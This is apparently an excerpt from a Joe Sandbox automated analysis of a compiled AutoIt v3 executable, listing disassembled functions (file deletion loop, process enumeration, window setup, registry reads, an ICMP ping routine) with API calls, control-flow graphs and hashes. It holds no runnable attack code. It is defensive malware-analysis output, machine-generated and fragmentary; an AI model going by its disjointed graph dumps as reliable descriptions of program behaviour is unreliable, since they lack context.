                                                                  • FindClose.KERNEL32(00000000), ref: 0068DD4C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                  • String ID: \*.*
                                                                  • API String ID: 2649000838-1173974218
                                                                  • Opcode ID: dc718431a9f34514a2313ac72a65bb11a11d0ba64e2b96b9e4144b4fd6294825
                                                                  • Instruction ID: 07e540027f54872c2be7ddb220bb58e13c28fdc83c7af0fae62bc56a7dfdfd09
                                                                  • Opcode Fuzzy Hash: dc718431a9f34514a2313ac72a65bb11a11d0ba64e2b96b9e4144b4fd6294825
                                                                  • Instruction Fuzzy Hash: E0319E310087959BC340FF20D8918EFB7EAAE95300F405E1DF4D186191EB21DA09CB67
                                                                  Function 0068DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0068DDAC
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0068DDBA
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0068DDDA
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0068DE87
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 420147892-0
                                                                  • Opcode ID: 2a695b14448834a9d4b7317f90574b76e5dc197ed035279f274b80fefefc0400
                                                                  • Instruction ID: 422f7e8dabeb7fa7bee7102c7ff3af4b1446fa42cded81e3e8572e3f0ae5657d
                                                                  • Opcode Fuzzy Hash: 2a695b14448834a9d4b7317f90574b76e5dc197ed035279f274b80fefefc0400
                                                                  • Instruction Fuzzy Hash: 393184711087019FD310EF54DC85AAFBBEAEF99350F040A2DF581871A1EB71A949CFA2
                                                                  Function 0063AC3E Relevance: 37.4, APIs: 1, Strings: 20, Instructions: 671COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 63ac3e-63b063 call 628ec0 call 63bc58 call 62e6a0 7 678584-678591 0->7 8 63b069-63b073 0->8 9 678596-6785a5 7->9 10 678593 7->10 11 63b079-63b07e 8->11 12 67896b-678979 8->12 15 6785a7 9->15 16 6785aa 9->16 10->9 13 6785b2-6785b4 11->13 14 63b084-63b090 call 63b5b6 11->14 17 67897e 12->17 18 67897b 12->18 22 6785bd 13->22 14->22 25 63b096-63b0a3 call 62c98d 14->25 15->16 16->13 20 678985-67898e 17->20 18->17 23 678993 20->23 24 678990 20->24 27 6785c7 22->27 28 67899c-6789eb call 62e6a0 call 63bbbe * 2 23->28 24->23 33 63b0ab-63b0b4 25->33 31 6785cf-6785d2 27->31 62 63b1e0-63b1f5 28->62 63 6789f1-678a03 call 63b5b6 28->63 34 63b158-63b16f 31->34 35 6785d8-678600 call 644cd3 call 627ad5 31->35 37 63b0b8-63b0d6 call 644d98 33->37 40 678954-678957 34->40 41 63b175 34->41 74 678602-678606 35->74 75 67862d-678651 call 627b1a call 62bd98 35->75 56 63b0e5 37->56 57 63b0d8-63b0e1 37->57 45 678a41-678a79 call 62e6a0 call 63bbbe 40->45 46 67895d-678960 40->46 47 6788ff-678920 call 62e6a0 41->47 48 63b17b-63b17e 41->48 45->62 98 678a7f-678a91 call 63b5b6 45->98 46->28 53 678962-678965 46->53 47->62 79 678926-678938 call 63b5b6 47->79 54 63b184-63b187 48->54 55 678729-678743 call 63bbbe 48->55 53->12 53->62 64 6786ca-6786e0 call 626c03 54->64 65 63b18d-63b190 54->65 83 67888f-6788b5 call 62e6a0 55->83 84 678749-67874c 55->84 56->27 68 63b0eb-63b0fc 56->68 57->37 66 63b0e3 57->66 69 63b1fb-63b20b call 62e6a0 62->69 70 678ac9-678acf 62->70 103 678a05-678a0d 63->103 104 678a2f-678a3c call 62c98d 63->104 64->62 101 6786e6-6786fc call 63b5b6 64->101 77 678656-678659 65->77 78 63b196-63b1b8 call 62e6a0 65->78 66->68 68->12 80 63b102-63b11c 68->80 70->33 86 678ad5 70->86 74->75 88 678608-67862b call 62ad40 74->88 75->77 77->12 81 67865f-678674 call 626c03 77->81 78->62 122 63b1ba-63b1cc call 63b5b6 78->122 109 678945 79->109 110 67893a-678943 call 62c98d 79->110 80->31 93 63b122-63b154 call 63bbbe call 62e6a0 80->93 81->62 127 67867a-678690 call 63b5b6 81->127 83->62 130 6788bb-6788cd call 63b5b6 83->130 96 6787bf-6787de call 62e6a0 84->96 97 67874e-678751 84->97 86->12 88->74 88->75 93->34 96->62 148 6787e4-6787f6 call 63b5b6 96->148 112 678757-678774 call 62e6a0 97->112 113 678ada-678ae8 97->113 144 678ab5-678abe call 62c98d 98->144 145 678a93-678a9b 98->145 149 6786fe-67870b call 628ec0 101->149 150 67870d-678716 call 628ec0 101->150 120 678a0f-678a13 103->120 121 678a1e-678a29 call 62b4b1 103->121 140 678ac2-678ac4 104->140 126 678949-67894f 109->126 110->126 112->62 157 67877a-67878c call 63b5b6 112->157 133 678aed-678afd 113->133 134 678aea 113->134 120->121 136 678a15-678a19 120->136 121->104 165 678b0b-678b19 121->165 166 63b1d2-63b1de 122->166 167 6786ba-6786c3 call 62c98d 122->167 126->62 168 678692-67869b call 62c98d 127->168 169 67869d-6786ab call 628ec0 127->169 172 6788cf-6788dc call 62c98d 130->172 173 6788de 130->173 151 678b02-678b06 133->151 152 678aff 133->152 134->133 153 678aa1-678aa3 136->153 140->62 144->140 158 678a9d 145->158 159 678aa8-678ab3 call 62b4b1 145->159 148->62 188 6787fc-678805 call 63b5b6 148->188 189 678719-678724 call 628577 149->189 150->189 151->69 152->151 153->62 192 67879f 157->192 193 67878e-67879d call 62c98d 157->193 158->153 159->144 159->165 178 678b1e-678b21 165->178 179 678b1b 165->179 166->62 167->64 200 6786ae-6786b5 168->200 169->200 187 6788e2-6788e9 172->187 173->187 178->20 179->178 195 6788f5 call 623907 187->195 196 6788eb-6788f0 call 62396b 187->196 210 678807-678816 call 62c98d 188->210 211 678818 188->211 189->62 202 6787a3-6787ae call 649334 192->202 193->202 209 6788fa 195->209 196->62 200->62 202->12 217 6787b4-6787ba 202->217 209->62 212 67881c-67883f 210->212 211->212 215 678841-678848 212->215 216 67884d-678850 212->216 215->216 219 678852-67885b 216->219 220 678860-678863 216->220 217->62 219->220 221 678865-67886e 220->221 222 678873-678876 220->222 221->222 222->62 223 67887c-67888a 222->223 223->62
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4k$@k$Pk$`*o$`k$d0b$d10m0$d1b$d1r0,2$d5m0$e#o$i$tk$tk$(o$(o$(o$(o$k$k
                                                                  • API String ID: 0-1517538552
                                                                  • Opcode ID: 910ace140b4fb243b8c176eb2f0cee41b7e9c4e5b53fec806d8ab23f3dac0d82
                                                                  • Instruction ID: 199398e98e31a80aaf348ecdc3f82008e588d932615c04f94e9406763a1b96ec
                                                                  • Opcode Fuzzy Hash: 910ace140b4fb243b8c176eb2f0cee41b7e9c4e5b53fec806d8ab23f3dac0d82
                                                                  • Instruction Fuzzy Hash: 166227B05083419FC768DF14C099AEABBE2FF88304F14896EE5998B351DB71D985CF82
                                                                  Function 00623624 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53windowregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00623657
                                                                  • RegisterClassExW.USER32(00000030), ref: 00623681
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00623692
                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 006236AF
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006236BF
                                                                  • LoadIconW.USER32(000000A9), ref: 006236D5
                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006236E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$0+m"b$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-2385080849
                                                                  • Opcode ID: 1cbbc87d74275f88054ba533df1cc196f886a829a7434fa2528b2d6e6c0d0fad
                                                                  • Instruction ID: 6c10148a5fc551b799384e4f281cd3a62c5d62338aef4c7ca073208671764dd1
                                                                  • Opcode Fuzzy Hash: 1cbbc87d74275f88054ba533df1cc196f886a829a7434fa2528b2d6e6c0d0fad
                                                                  • Instruction Fuzzy Hash: FF21EAB1D0121AAFDB00DF95E889ADD7BB6FB08710F00611AF515AB2A0E7B54580CF50
                                                                  Function 0062370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145windowtimeregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 356 62370f-623724 357 623726-623729 356->357 358 623784-623786 356->358 359 62378a 357->359 360 62372b-623732 357->360 358->357 361 623788 358->361 365 663df4-663e1c call 622f92 call 63f23c 359->365 366 623790-623795 359->366 362 623804-62380c PostQuitMessage 360->362 363 623738-62373d 360->363 364 62376f-623777 DefWindowProcW 361->364 373 6237b8-6237ba 362->373 369 623743-623747 363->369 370 663e61-663e75 call 68c8f7 363->370 372 62377d-623783 364->372 402 663e21-663e28 365->402 367 623797-62379a 366->367 368 6237bc-6237e3 SetTimer RegisterWindowMessageW 366->368 374 6237a0-6237b3 KillTimer call 623907 call 6259ff 367->374 375 663d95-663d98 367->375 368->373 376 6237e5-6237f0 CreatePopupMenu 368->376 377 62380e-623818 call 63fcad 369->377 378 62374d-623752 369->378 370->373 395 663e7b 370->395 373->372 374->373 381 663dd0-663def MoveWindow 375->381 382 663d9a-663d9e 375->382 376->373 397 62381d 377->397 384 663e46-663e4d 378->384 385 623758-62375d 378->385 381->373 389 663da0-663da3 382->389 390 663dbf-663dcb SetFocus 382->390 384->364 392 663e53-663e5c call 681423 384->392 393 6237f2-623802 call 62381f 385->393 394 623763-623769 385->394 389->394 398 663da9-663dba call 622f92 389->398 390->373 392->364 393->373 394->364 394->402 395->364 397->373 398->373 402->364 406 663e2e-663e41 call 623907 call 62396b 402->406 406->364
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00623709,?,?), ref: 00623777
                                                                  • KillTimer.USER32(?,00000001,?,?,?,?,?,00623709,?,?), ref: 006237A3
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006237C6
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00623709,?,?), ref: 006237D1
                                                                  • CreatePopupMenu.USER32 ref: 006237E5
                                                                  • PostQuitMessage.USER32(00000000), ref: 00623806
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                  • String ID: 0$o$0$o$TaskbarCreated
                                                                  • API String ID: 129472671-1445687470
                                                                  • Opcode ID: d19d4590bf0bf4e036aaf4f798367bcd2f4da360e8ec66adc52d69fdc6a83886
                                                                  • Instruction ID: c57f6e7f719b2a492a21e8fddcb5b969b9d9eace71e49ba6d5dcfefedd586f5c
                                                                  • Opcode Fuzzy Hash: d19d4590bf0bf4e036aaf4f798367bcd2f4da360e8ec66adc52d69fdc6a83886
                                                                  • Instruction Fuzzy Hash: 2541D5F1244A76BADF142B28AC69BF93B67E705300F004229F5018E390DBBD9B45DF69
                                                                  Function 006609DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 412 6609db-660a0b call 6607af 415 660a26-660a32 call 655594 412->415 416 660a0d-660a18 call 64f636 412->416 422 660a34-660a49 call 64f636 call 64f649 415->422 423 660a4b-660a94 call 66071a 415->423 421 660a1a-660a21 call 64f649 416->421 433 660cfd-660d03 421->433 422->421 431 660a96-660a9f 423->431 432 660b01-660b0a GetFileType 423->432 437 660ad6-660afc GetLastError call 64f613 431->437 438 660aa1-660aa5 431->438 434 660b53-660b56 432->434 435 660b0c-660b3d GetLastError call 64f613 CloseHandle 432->435 440 660b5f-660b65 434->440 441 660b58-660b5d 434->441 435->421 449 660b43-660b4e call 64f649 435->449 437->421 438->437 442 660aa7-660ad4 call 66071a 438->442 445 660b69-660bb7 call 6554dd 440->445 446 660b67 440->446 441->445 442->432 442->437 455 660bc7-660beb call 6604cd 445->455 456 660bb9-660bc5 call 66092b 445->456 446->445 449->421 462 660bfe-660c41 455->462 463 660bed 455->463 456->455 461 660bef-660bf9 call 658a2e 456->461 461->433 465 660c62-660c70 462->465 466 660c43-660c47 462->466 463->461 469 660c76-660c7a 465->469 470 660cfb 465->470 466->465 468 660c49-660c5d 466->468 468->465 469->470 471 660c7c-660caf CloseHandle call 66071a 469->471 470->433 474 660ce3-660cf7 471->474 475 660cb1-660cdd GetLastError call 64f613 call 6556a6 471->475 474->470 475->474
                                                                  APIs
                                                                    • Part of subcall function 0066071A: CreateFileW.KERNEL32(00000000,00000000,?,00660A84,?,?,00000000,?,00660A84,00000000,0000000C), ref: 00660737
                                                                  • GetLastError.KERNEL32 ref: 00660AEF
                                                                  • __dosmaperr.LIBCMT ref: 00660AF6
                                                                  • GetFileType.KERNEL32(00000000), ref: 00660B02
                                                                  • GetLastError.KERNEL32 ref: 00660B0C
                                                                  • __dosmaperr.LIBCMT ref: 00660B15
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00660B35
                                                                  • CloseHandle.KERNEL32(?), ref: 00660C7F
                                                                  • GetLastError.KERNEL32 ref: 00660CB1
                                                                  • __dosmaperr.LIBCMT ref: 00660CB8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                  • String ID: H
                                                                  • API String ID: 4237864984-2852464175
                                                                  • Opcode ID: e59576c22b7adbbb13ae55eac0201728fe0aff5681fea5762d00b59575bfbf7e
                                                                  • Instruction ID: ecffad4671a219aa271c77ccca5844f88583f0e97e3a5caa632074de75c9bb2e
                                                                  • Opcode Fuzzy Hash: e59576c22b7adbbb13ae55eac0201728fe0aff5681fea5762d00b59575bfbf7e
                                                                  • Instruction Fuzzy Hash: E0A11532A141488FEF19AF68D852BAE7BE2AB06324F14016DF811DF3D2D7319D16CB55
                                                                  Function 006252A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00625594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00664B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 006255B2
                                                                    • Part of subcall function 00625238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0062525A
                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006253C4
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00664BFD
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00664C3E
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00664C80
                                                                  • _wcslen.LIBCMT ref: 00664CE7
                                                                  • _wcslen.LIBCMT ref: 00664CF6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                  • API String ID: 98802146-2727554177
                                                                  • Opcode ID: f5a11bf5ce640fede83211d320e2809839a97e822b33b07d03cd7fe44eba5c5c
                                                                  • Instruction ID: 496559ad662054c3cadfb9eeb0033fcac9372a103ee5ccda605aa2baafd74c0c
                                                                  • Opcode Fuzzy Hash: f5a11bf5ce640fede83211d320e2809839a97e822b33b07d03cd7fe44eba5c5c
                                                                  • Instruction Fuzzy Hash: 8871BEB25053619FC314EF65EC819ABBBEAFF98340F40542EF141872A0EF719A49CB95
                                                                  Function 006234D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 006234DE
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 006234ED
                                                                  • LoadIconW.USER32(00000063), ref: 00623503
                                                                  • LoadIconW.USER32(000000A4), ref: 00623515
                                                                  • LoadIconW.USER32(000000A2), ref: 00623527
                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0062353F
                                                                  • RegisterClassExW.USER32(?), ref: 00623590
                                                                    • Part of subcall function 00623624: GetSysColorBrush.USER32(0000000F), ref: 00623657
                                                                    • Part of subcall function 00623624: RegisterClassExW.USER32(00000030), ref: 00623681
                                                                    • Part of subcall function 00623624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00623692
                                                                    • Part of subcall function 00623624: InitCommonControlsEx.COMCTL32(?), ref: 006236AF
                                                                    • Part of subcall function 00623624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006236BF
                                                                    • Part of subcall function 00623624: LoadIconW.USER32(000000A9), ref: 006236D5
                                                                    • Part of subcall function 00623624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006236E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                  • String ID: #$0$AutoIt v3
                                                                  • API String ID: 423443420-4155596026
                                                                  • Opcode ID: 1da109af2596d3bf602749313680d0c12d18dff41c6435cec8f2f666b7bafbce
                                                                  • Instruction ID: 8790fe1780cef42fb447f0ba4d65fe18aeee9e17047401b975d43b078fe309e9
                                                                  • Opcode Fuzzy Hash: 1da109af2596d3bf602749313680d0c12d18dff41c6435cec8f2f666b7bafbce
                                                                  • Instruction Fuzzy Hash: EF2153F2D00316ABDB109F99EC65BA97FB6FB08754F00102AF604A6360D7B94985CF90
                                                                  Function 006A0FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 553 6a0fb8-6a0fef call 62e6a0 556 6a100f-6a1021 WSAStartup 553->556 557 6a0ff1-6a0ffe call 62c98d 553->557 559 6a1023-6a1031 556->559 560 6a1054-6a1091 call 63c1f6 call 628ec0 call 63f9d4 inet_addr gethostbyname 556->560 557->556 566 6a1000-6a100b call 62c98d 557->566 563 6a1033 559->563 564 6a1036-6a1046 559->564 576 6a10a2-6a10b0 560->576 577 6a1093-6a10a0 IcmpCreateFile 560->577 563->564 567 6a104b-6a104f 564->567 568 6a1048 564->568 566->556 569 6a1249-6a1251 567->569 568->567 579 6a10b2 576->579 580 6a10b5-6a10c5 576->580 577->576 578 6a10d3-6a1100 call 64017b call 62423c 577->578 589 6a112b-6a1148 IcmpSendEcho 578->589 590 6a1102-6a1129 IcmpSendEcho 578->590 579->580 581 6a10ca-6a10ce 580->581 582 6a10c7 580->582 584 6a1240-6a1244 call 62bd98 581->584 582->581 584->569 591 6a114c-6a114e 589->591 590->591 592 6a11ae-6a11bc 591->592 593 6a1150-6a1155 591->593 594 6a11be 592->594 595 6a11c1-6a11c8 592->595 596 6a115b-6a1160 593->596 597 6a11f8-6a120a call 62e6a0 593->597 594->595 598 6a11e4-6a11ed 595->598 599 6a11ca-6a11d8 596->599 600 6a1162-6a1167 596->600 611 6a120c-6a120e 597->611 612 6a1210 597->612 604 6a11ef 598->604 605 6a11f2-6a11f6 598->605 602 6a11da 599->602 603 6a11dd 599->603 600->592 606 6a1169-6a116e 600->606 602->603 603->598 604->605 608 6a1212-6a1229 IcmpCloseHandle WSACleanup 605->608 609 6a1193-6a11a1 606->609 610 6a1170-6a1175 606->610 608->584 616 6a122b-6a123d call 64013d call 640184 608->616 614 6a11a3 609->614 615 6a11a6-6a11ac 609->615 610->599 613 6a1177-6a1185 610->613 611->608 612->608 618 6a118a-6a1191 613->618 619 6a1187 613->619 614->615 615->598 616->584 618->598 619->618
                                                                  APIs
                                                                  • WSAStartup.WS2_32(00000101,?), ref: 006A1019
                                                                  • inet_addr.WSOCK32(?), ref: 006A1079
                                                                  • gethostbyname.WS2_32(?), ref: 006A1085
                                                                  • IcmpCreateFile.IPHLPAPI ref: 006A1093
                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006A1123
                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006A1142
                                                                  • IcmpCloseHandle.IPHLPAPI(?), ref: 006A1216
                                                                  • WSACleanup.WSOCK32 ref: 006A121C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                  • String ID: Ping
                                                                  • API String ID: 1028309954-2246546115
                                                                  • Opcode ID: 1ecd367b0e954f46d7848ff7f0bd7fce4f6587d4a2225c730b9c143450f7b12e
                                                                  • Instruction ID: cff1c33be699caf32c5dc21a03b7aa095ff66e5ba963b43c3d8411a5fef24c66
                                                                  • Opcode Fuzzy Hash: 1ecd367b0e954f46d7848ff7f0bd7fce4f6587d4a2225c730b9c143450f7b12e
                                                                  • Instruction Fuzzy Hash: 39919F716042419FD720EF19C884F56BBE2AF46318F1485A9F5658F7A2C731ED85CF81
                                                                  Function 0062F6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
